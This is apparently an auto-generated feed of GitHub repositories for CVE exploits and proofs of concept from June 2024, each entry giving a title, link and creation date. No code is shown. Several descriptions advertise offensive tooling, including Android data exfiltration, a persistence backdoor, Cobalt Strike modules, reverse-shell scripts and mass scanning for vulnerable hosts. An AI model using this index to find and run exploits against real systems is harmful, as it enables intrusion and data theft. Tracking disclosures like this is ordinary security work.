**no description** : [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231) create time: 2024-06-18T11:43:23Z

**no description** : [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257) create time: 2024-06-18T11:27:57Z

**no description** : [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232) create time: 2024-06-18T11:05:06Z

**Exploit for CVE-2019-8805 Apple EndpointSecurity framework Privilege Escalation** : [securelayer7/CVE-2019-8805](https://github.com/securelayer7/CVE-2019-8805) create time: 2024-06-18T09:49:03Z

**Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability remotely** : [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter) create time: 2024-06-18T09:22:59Z

**Ivanti EPM SQL Injection Remote Code Execution Vulnerability** : [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824) create time: 2024-06-18T09:07:23Z

**no description** : [krnidhi/linux_4.19.72_CVE-2019-17133](https://github.com/krnidhi/linux_4.19.72_CVE-2019-17133) create time: 2024-06-18T06:21:53Z

**no description** : [uthrasri/System_Connectivity_Wificond_CVE-2021-0392](https://github.com/uthrasri/System_Connectivity_Wificond_CVE-2021-0392) create time: 2024-06-18T06:25:02Z

**no description** : [uthrasri/Packages_app_settings_CVE-2021-0523](https://github.com/uthrasri/Packages_app_settings_CVE-2021-0523) create time: 2023-10-26T20:01:07Z

**This script is the Proof of Concept (PoC) of the CVE-2024-21413, a significant security vulnerability discovered in the Microsoft Windows Outlook having a strong 9.8 critical CVSS score. Named as #MonikerLink Bug, this vulnerability allows the attacker to execute the arbitrary code remotely on the victim's machine, thus becomes a full-fledged RCE.** : [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413) create time: 2024-06-18T08:11:33Z

**no description** : [Trinadh465/packages_apps_Settings_CVE-2020-0201](https://github.com/Trinadh465/packages_apps_Settings_CVE-2020-0201) create time: 2024-06-18T06:36:13Z

**no description** : [kvx07/CVE_2024_30078_A_POC](https://github.com/kvx07/CVE_2024_30078_A_POC) create time: 2024-06-18T04:43:31Z

**CVE-2024-23692 Exploit** : [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP) create time: 2024-06-18T03:27:47Z

**POC for CVE-2024-37843. Craft CMS itm-based blind SQLi** : [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC) create time: 2024-06-18T02:27:04Z

**Expolit for CVE-2024-23334 (aiohttp >= 1.0.5> && <=3.9.1)** : [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334) create time: 2024-06-17T16:28:35Z

**All 2024 CVEs as of 6/17/2024** : [SecG3ek/2024_CVEs](https://github.com/SecG3ek/2024_CVEs) create time: 2024-06-17T18:05:08Z

**CVE-2024-4577 POC** : [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577) create time: 2024-06-17T17:53:31Z

**no description** : [52by/CVE-2024-30078](https://github.com/52by/CVE-2024-30078) create time: 2024-06-17T17:48:23Z

**no description** : [N00BS3c/CVE-2024-30078](https://github.com/N00BS3c/CVE-2024-30078) create time: 2024-06-17T14:49:19Z

**This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367** : [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo) create time: 2024-06-17T11:39:41Z

**no description** : [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692) create time: 2024-06-17T08:46:48Z

**WinRAR漏洞测试复现。详参:https://flowus.cn/share/a3b35db0-ab5e-4abc-b8d3-5ff284e82e7b** : [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831) create time: 2024-06-17T07:30:47Z

**no description** : [BBD-YZZ/CVE-2024-23691](https://github.com/BBD-YZZ/CVE-2024-23691) create time: 2024-06-17T08:15:32Z

**no description** : [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104) create time: 2024-06-17T07:57:58Z

**A PoC Exploit for CVE-2024-0757 - Insert or Embed Articulate Content into WordPress Remote Code Execution (RCE)** : [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit) create time: 2024-06-17T07:46:21Z

**WinRAR漏洞测试复现。详参:https://flowus.cn/a3b35db0-ab5e-4abc-b8d3-5ff284e82e7b** : [imbyter/WinRAR_CVE-2023-38831](https://github.com/imbyter/WinRAR_CVE-2023-38831) create time: 2024-06-17T06:53:08Z

**Exploit of CVE-2024-0757 (Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Authenticated - Upload to RCE)** : [hunThubSpace/CVE-2024-0757](https://github.com/hunThubSpace/CVE-2024-0757) create time: 2024-06-17T06:55:34Z

**no description** : [imbyter/WinRAR_CVE-2023-38831](https://github.com/imbyter/WinRAR_CVE-2023-38831) create time: 2024-06-17T06:14:51Z

**CVE-2024-30078 Detection and Command Execution Script** : [lvyitian/CVE-2024-30078-](https://github.com/lvyitian/CVE-2024-30078-) create time: 2024-06-16T08:06:03Z

**no description** : [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889) create time: 2024-06-17T04:50:00Z

**no description** : [rootkalilocalhost/CVE-2023-2640-CVE-2023-32629](https://github.com/rootkalilocalhost/CVE-2023-2640-CVE-2023-32629) create time: 2024-06-16T22:17:04Z

**PoC for iTerm2 CVEs CVE-2024-38396 and CVE-2024-38395 which allow code execution** : [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396) create time: 2024-06-16T09:43:46Z

**The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252** : [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252) create time: 2024-06-16T12:35:57Z

**The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252** : [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252) create time: 2024-06-16T12:33:45Z

**no description** : [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607) create time: 2024-06-16T10:50:32Z

**CVE-2024-23692 exp** : [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp) create time: 2024-06-16T07:04:01Z

**Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。 微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意行为者的主要目标。** : [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229) create time: 2024-06-16T05:06:31Z

**Python script for get reverse shell with using CVE-2024-4577** : [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577) create time: 2024-06-15T21:16:49Z

**no description** : [Shadow-Spinner/CVE-2012-2982_python](https://github.com/Shadow-Spinner/CVE-2012-2982_python) create time: 2024-06-15T20:01:53Z

**CVE-2024-30078 Detection and Command Execution Script** : [alperenugurlu/CVE-2024-30078-](https://github.com/alperenugurlu/CVE-2024-30078-) create time: 2024-06-15T19:37:56Z

**PHP CGI Remote Code Execution (CVE-2024-4577) PoC** : [sug4r-wr41th/CVE-2024-4577](https://github.com/sug4r-wr41th/CVE-2024-4577) create time: 2024-06-15T18:05:31Z

**CVE-2024-36837 POC** : [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837) create time: 2024-06-15T16:44:51Z

**snapcreek_duplicator file read vulnerability https://www.cvedetails.com/cve/CVE-2020-11738/** : [raghu66669999/wordpress-snapcreek](https://github.com/raghu66669999/wordpress-snapcreek) create time: 2024-06-15T11:09:41Z

**CVE-2024-24590 ClearML RCE&CMD POC** : [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC) create time: 2024-06-15T10:09:51Z

**no description** : [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit) create time: 2024-06-15T08:27:46Z

**Tool for validating / testing CVE-2024-36416** : [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416) create time: 2024-06-09T07:18:54Z

**Argument injection vulnerability in PHP** : [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577) create time: 2024-06-15T02:49:37Z

**CVE-2024-28995 POC Vulnerability Scanner** : [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995) create time: 2024-06-14T23:05:40Z

**vsFTPd 2.3.4 OS Command Injection (CVE-2011-2523) Remote Code Execution PoC** : [sug4r-wr41th/CVE-2011-2523](https://github.com/sug4r-wr41th/CVE-2011-2523) create time: 2024-06-14T21:32:09Z

**For learning purpose did a complete analysis on CVE-2021-40444 POC (proof of concept)** : [skitkat/CVE-2021-40444-POC](https://github.com/skitkat/CVE-2021-40444-POC) create time: 2024-06-14T19:04:02Z

**For learning purpose did a complete analysis on CVE-2022-30190 "Follina" POC** : [skitkat/CVE-2022-30190-POC](https://github.com/skitkat/CVE-2022-30190-POC) create time: 2024-06-14T16:36:39Z

**TikiWiki CMS Groupware v8.3 - Open Redirect** : [Cappricio-Securities/CVE-2012-5321](https://github.com/Cappricio-Securities/CVE-2012-5321) create time: 2024-06-14T14:57:55Z

**SolarWinds Serv-U Directory Traversal Vulnerability (CVE-2024-28995) POC** : [karkis3c/cves](https://github.com/karkis3c/cves) create time: 2024-06-13T12:02:33Z

**Exploit for CVE-2024-28995** : [0xkucing/CVE-2024-28995](https://github.com/0xkucing/CVE-2024-28995) create time: 2024-06-14T08:04:48Z

**no description** : [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template) create time: 2024-06-14T08:01:13Z

**no description** : [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995) create time: 2024-06-14T07:56:03Z

**no description** : [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC) create time: 2024-06-14T07:15:50Z

**no description** : [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE) create time: 2024-06-14T07:13:54Z

**no description** : [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc) create time: 2024-06-14T07:12:29Z

**no description** : [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173) create time: 2024-06-14T07:04:46Z

**no description** : [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc) create time: 2024-06-14T07:04:36Z

**no description** : [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc) create time: 2024-06-14T07:01:58Z

**CVE-2024-28995 PoC** : [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995) create time: 2024-06-14T04:06:58Z

**no description** : [qinzhu111/uWSGI-CVE-2018-7490-POC](https://github.com/qinzhu111/uWSGI-CVE-2018-7490-POC) create time: 2024-06-14T02:50:35Z

**no description** : [qinzhu111/uWSGI-CVE-2018-7490-POC](https://github.com/qinzhu111/uWSGI-CVE-2018-7490-POC) create time: 2024-06-14T02:30:07Z

**no description** : [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692) create time: 2024-06-14T01:33:19Z

**no description** : [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit) create time: 2024-06-13T22:17:57Z

**PDF.js是由Mozilla维护的基于JavaScript的PDF查看器。此漏洞允许攻击者在打开恶意 PDF 文件后立即执行任意 JavaScript 代码。这会影响所有 Firefox 用户 (<126),因为 Firefox 使用 PDF.js 来显示 PDF 文件,但也严重影响了许多基于 Web 和 Electron 的应用程序,这些应用程序(间接)使用 PDF.js 进行预览功能。** : [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed) create time: 2024-06-13T15:14:47Z

**Fixed and minimalist PoC of the CVE-2024-4577** : [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577) create time: 2024-06-13T14:25:04Z

**Fix for CVE-2018-15473** : [yZ1337/CVE-2018-15473](https://github.com/yZ1337/CVE-2018-15473) create time: 2024-06-13T09:55:01Z

**no description** : [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE) create time: 2024-06-13T13:13:10Z

**no description** : [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577) create time: 2024-06-13T11:28:33Z

**no description** : [RHYru9/CVE-2024-28890-checker](https://github.com/RHYru9/CVE-2024-28890-checker) create time: 2024-06-13T10:41:33Z

**PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855** : [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855) create time: 2024-06-13T08:32:55Z

**Improved Golang Version of Rapid7 PoC for CVE-2022-1026** : [r0lh/kygocera](https://github.com/r0lh/kygocera) create time: 2024-06-13T09:40:02Z

**no description** : [kaliankhe/CVEs-2024](https://github.com/kaliankhe/CVEs-2024) create time: 2024-06-13T10:08:10Z

**BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel** : [NVISOsecurity/CVE-2024-26229-BOF](https://github.com/NVISOsecurity/CVE-2024-26229-BOF) create time: 2024-06-12T11:11:16Z

**Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051)** : [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051) create time: 2024-06-13T09:15:58Z

**no description** : [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692) create time: 2024-06-13T09:12:06Z

**Type Toast vulnerability** : [ASIFASSU/CVE-2020-0014](https://github.com/ASIFASSU/CVE-2020-0014) create time: 2024-06-13T06:28:02Z

**Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)** : [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS) create time: 2024-06-13T06:00:24Z

**Valve Press - CVE-2024-27956-RCE - SQL Injection** : [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE) create time: 2024-06-13T02:05:31Z

**This Ruby script checks if a given WordPress site is vulnerable to CVE-2024-31210, which allows administrator-level users on single-site installations and Super Admin-level users on Multisite installations to execute arbitrary PHP code via the plugin upload mechanism.** : [Abo5/CVE-2024-31210](https://github.com/Abo5/CVE-2024-31210) create time: 2024-06-13T00:24:56Z

**script to detect if the installed Ruby version on your system is vulnerable to CVE-2024-27282. You should read the description of the vulnerability for more details: https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/** : [Abo5/CVE-2024-27282](https://github.com/Abo5/CVE-2024-27282) create time: 2024-06-12T23:54:03Z

**This script uses HTTParty to detect stored cross-site scripting (XSS) vulnerabilities in WordPress sites using the xai_username parameter. It sends a payload to the specified URL and checks if the payload is reflected in the response, indicating a vulnerability.** : [Abo5/CVE-2024-4484](https://github.com/Abo5/CVE-2024-4484) create time: 2024-06-12T23:09:39Z

**no description** : [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc) create time: 2024-06-12T19:38:42Z

**Another CVE-2024-24590 poc** : [pandahacker2763/CVE-2024-24590](https://github.com/pandahacker2763/CVE-2024-24590) create time: 2024-06-12T15:07:46Z

**Ivanti EPM SQL Injection Remote Code Execution Vulnerability** : [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824) create time: 2024-06-12T13:53:32Z

**Exploit for CVE-2019-19030 that affects Harbor versions <1.10.3 and <2.0.1. Can also be used to enumerate and pull public projects from higher versions.** : [shodanwashere/boatcrash](https://github.com/shodanwashere/boatcrash) create time: 2024-06-12T11:46:57Z

**no description** : [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE) create time: 2024-06-12T11:50:01Z

**DRive a backdoor exploiting CVE-2024-26229 for privilege escalation and persistence** : [0XJ175/DRive](https://github.com/0XJ175/DRive) create time: 2024-06-12T02:47:17Z

**CVE-2024-4898 InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup/Arbitrary Options Update/Administrative User Creation** : [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc) create time: 2024-06-12T10:03:14Z

**BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel** : [Cerbersec/CVE-2024-26229-BOF](https://github.com/Cerbersec/CVE-2024-26229-BOF) create time: 2024-06-12T10:08:17Z

**Likeshop < 2.5.7.20210311 - Arbitrary File Upload** : [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352) create time: 2024-06-12T09:46:26Z

**no description** : [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169) create time: 2024-06-12T08:24:30Z

**no description** : [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE) create time: 2024-06-12T08:14:39Z

**no description** : [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis) create time: 2024-06-12T07:33:41Z

**no description** : [raytran54/CVE-2018-7600](https://github.com/raytran54/CVE-2018-7600) create time: 2024-06-12T06:40:17Z

**POC for CVE-2024-4577 with Shodan integration** : [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577) create time: 2024-06-12T06:45:08Z

**Procedure to Recreate the Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver** : [ISH2YU/CVE-2023-11518](https://github.com/ISH2YU/CVE-2023-11518) create time: 2024-06-12T06:19:50Z

**CVE-2024-4577** : [aaddmin1122345/CVE-2024-4577-POC](https://github.com/aaddmin1122345/CVE-2024-4577-POC) create time: 2024-06-12T04:50:25Z

**php-cgi RCE快速检测** : [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577) create time: 2024-06-12T02:16:09Z

**Proof of concept for CVE-2024-24590** : [OxyDeV2/PoC-CVE-2024-24590](https://github.com/OxyDeV2/PoC-CVE-2024-24590) create time: 2024-06-11T22:30:26Z

**CVE-2023-20598 Kernel Driver - Elevation of Privilege** : [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL) create time: 2024-06-11T22:03:51Z

**no description** : [LordVileOnX/-POC-CVE-2024-24590-Pickle-Load-on-Artifact-Get.-ClearML](https://github.com/LordVileOnX/-POC-CVE-2024-24590-Pickle-Load-on-Artifact-Get.-ClearML) create time: 2024-06-11T17:33:36Z

**CVE-2024-37051 poc and exploit** : [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP) create time: 2024-06-11T16:01:13Z

**no description** : [otterpwn/CVE-2024-26229](https://github.com/otterpwn/CVE-2024-26229) create time: 2024-06-11T15:56:32Z

**This is a PoC for PHP CVE-2024-4577.** : [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577) create time: 2024-06-11T15:11:56Z

**Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster** : [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094) create time: 2024-06-11T14:19:17Z

**no description** : [CharonDefalt/2024-CVE-Critical](https://github.com/CharonDefalt/2024-CVE-Critical) create time: 2024-06-11T10:43:02Z

**CVE-2024-30212** : [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak) create time: 2024-06-11T09:13:16Z

**Basic POC to test CVE-2024-3094** : [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094) create time: 2024-06-11T08:39:31Z

**Windows LPE** : [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit) create time: 2024-06-11T08:03:29Z

**no description** : [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692) create time: 2024-06-11T07:21:04Z

**CVE-2022-36446 POC 실습** : [Kang3639/CVE-2022-36446](https://github.com/Kang3639/CVE-2022-36446) create time: 2024-06-11T04:21:28Z

**no description** : [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919) create time: 2024-06-11T03:33:30Z

**SpiderFlow Crawler Platform - Remote Code Execution** : [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195) create time: 2024-06-11T02:34:34Z

**This repository contains the exploit code for CVE-2023-33105, a vulnerability identified in Qualcomm devices. The exploit leverages authentication frames to perform a denial of service (DoS) attack on a target access point (AP) by sending a large number of open authentication frames with an invalid transaction sequence number.** : [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware) create time: 2024-06-10T17:20:06Z

**CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code** : [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229) create time: 2024-06-10T17:02:03Z

**The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821** : [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821) create time: 2024-06-10T15:52:02Z

**Results of my research I have done on CVE-2021-30481 and on wallhacks in the videogame Counter-Strike 2** : [JHVIW/jhviw.github.io](https://github.com/JHVIW/jhviw.github.io) create time: 2024-05-31T09:43:39Z

**no description** : [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086) create time: 2024-06-10T15:19:39Z

**Vulnerability check script for CVE-2024-37393 (SecurEnvoy MFA 9.4.513)** : [optistream/securenvoy-cve-2024-37393](https://github.com/optistream/securenvoy-cve-2024-37393) create time: 2024-06-10T12:42:57Z

**no description** : [paradox0909/cve-2022-30333_online_rar_extracor](https://github.com/paradox0909/cve-2022-30333_online_rar_extracor) create time: 2024-06-10T08:17:50Z

**CVE-2023-4771 PoC CKEditor 4 Cross-site scripting (XSS) vulnerability in AJAX sample** : [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771) create time: 2024-06-10T08:19:24Z

**Bash script that checks if a PHP CGI setup is vulnerable to the CVE-2024-4577 argument injection vulnerability** : [it-t4mpan/check_cve_2024_4577.sh](https://github.com/it-t4mpan/check_cve_2024_4577.sh) create time: 2024-06-10T07:28:44Z

**Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)** : [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849) create time: 2024-06-10T06:12:20Z

**Python script to automate the process of finding vulnerable sites for CVE-2024-24919.** : [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919) create time: 2024-06-10T01:29:19Z

**no description** : [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT) create time: 2024-06-09T23:32:11Z

**CVE-2021-42562: Improper Access Control in MITRE Caldera** : [mbadanoiu/CVE-2021-42562](https://github.com/mbadanoiu/CVE-2021-42562) create time: 2024-06-09T23:04:45Z

**CVE-2021-42561: Command Injection via the Human Plugin in MITRE Caldera** : [mbadanoiu/CVE-2021-42561](https://github.com/mbadanoiu/CVE-2021-42561) create time: 2024-06-09T22:39:46Z

**no description** : [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT) create time: 2024-06-09T22:25:22Z

**CVE-2021-42560: Unsafe XML Parsing in MITRE Caldera** : [mbadanoiu/CVE-2021-42560](https://github.com/mbadanoiu/CVE-2021-42560) create time: 2024-06-09T21:33:07Z

**CVE-2021-42559: Command Injection via Configurations in MITRE Caldera** : [mbadanoiu/CVE-2021-42559](https://github.com/mbadanoiu/CVE-2021-42559) create time: 2024-06-09T21:07:16Z

**CVE-2021-42558: Multiple Cross-Site Scripting in MITRE Caldera** : [mbadanoiu/CVE-2021-42558](https://github.com/mbadanoiu/CVE-2021-42558) create time: 2024-06-09T20:20:46Z

**My exploit for CVE-2022-32250 for linux kernel 5.18** : [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250) create time: 2024-06-09T19:53:54Z

**no description** : [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405) create time: 2024-06-09T18:55:03Z

**no description** : [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404) create time: 2024-06-09T18:50:59Z

**no description** : [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404) create time: 2024-06-09T18:16:03Z

**PHP CGI Argument Injection vulnerability** : [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577) create time: 2024-06-09T14:18:21Z

**python poc编写练手,可以对单个目标或批量检测** : [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577) create time: 2024-06-09T13:46:46Z

**no description** : [Grey-Junior/CVE-2020-13958](https://github.com/Grey-Junior/CVE-2020-13958) create time: 2024-06-09T12:07:53Z

**POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal** : [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956) create time: 2024-06-09T10:57:29Z

**An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.** : [Jhonsonwannaa/CVE-2024-31819](https://github.com/Jhonsonwannaa/CVE-2024-31819) create time: 2024-06-09T08:48:21Z

**no description** : [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956) create time: 2024-06-09T07:21:44Z

**POC - CVE-2024–24919 - Check Point Security Gateways** : [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919) create time: 2024-06-09T06:54:51Z

**no description** : [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358) create time: 2024-06-09T06:30:06Z

**Objective: Demonstrate the exploitation of the Log4Shell vulnerability (CVE-2021-44228) within a simulated banking application environment.** : [tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment](https://github.com/tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment) create time: 2024-06-09T02:49:42Z

**Oracle E-Business Suite <=12.2 - Authentication Bypass** : [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500) create time: 2024-06-09T02:59:45Z

**https://nvd.nist.gov/vuln/detail/CVE-2024-29269** : [Jhonsonwannaa/CVE-2024-29269](https://github.com/Jhonsonwannaa/CVE-2024-29269) create time: 2024-06-08T22:06:33Z

**NSE script to check if app is vulnerable to cve-2023-22515** : [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515) create time: 2024-06-08T20:04:44Z

**全球首款利用PHP默认环境的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP** : [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE) create time: 2024-06-08T13:04:45Z

**PoC for CVE-2024-4577 written in bash, go, python and a nuclei template** : [ZephrFish/CVE-2024-4577-PoC](https://github.com/ZephrFish/CVE-2024-4577-PoC) create time: 2024-06-08T12:23:35Z

**no description** : [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919) create time: 2024-06-08T10:17:00Z

**CVE-2024-4577 Exploit POC** : [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577) create time: 2024-06-08T06:36:14Z

**Proof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrary commands.** : [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577) create time: 2024-06-08T05:27:44Z

**CVE-2024-4577 nuclei-templates** : [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei) create time: 2024-06-08T03:12:28Z

**Autonomy Ultraseek - Open Redirect** : [Cappricio-Securities/CVE-2009-0347](https://github.com/Cappricio-Securities/CVE-2009-0347) create time: 2024-06-08T02:27:55Z

**CVE-2021-22204 exploit script** : [cc3305/CVE-2021-22204](https://github.com/cc3305/CVE-2021-22204) create time: 2024-06-07T21:57:22Z

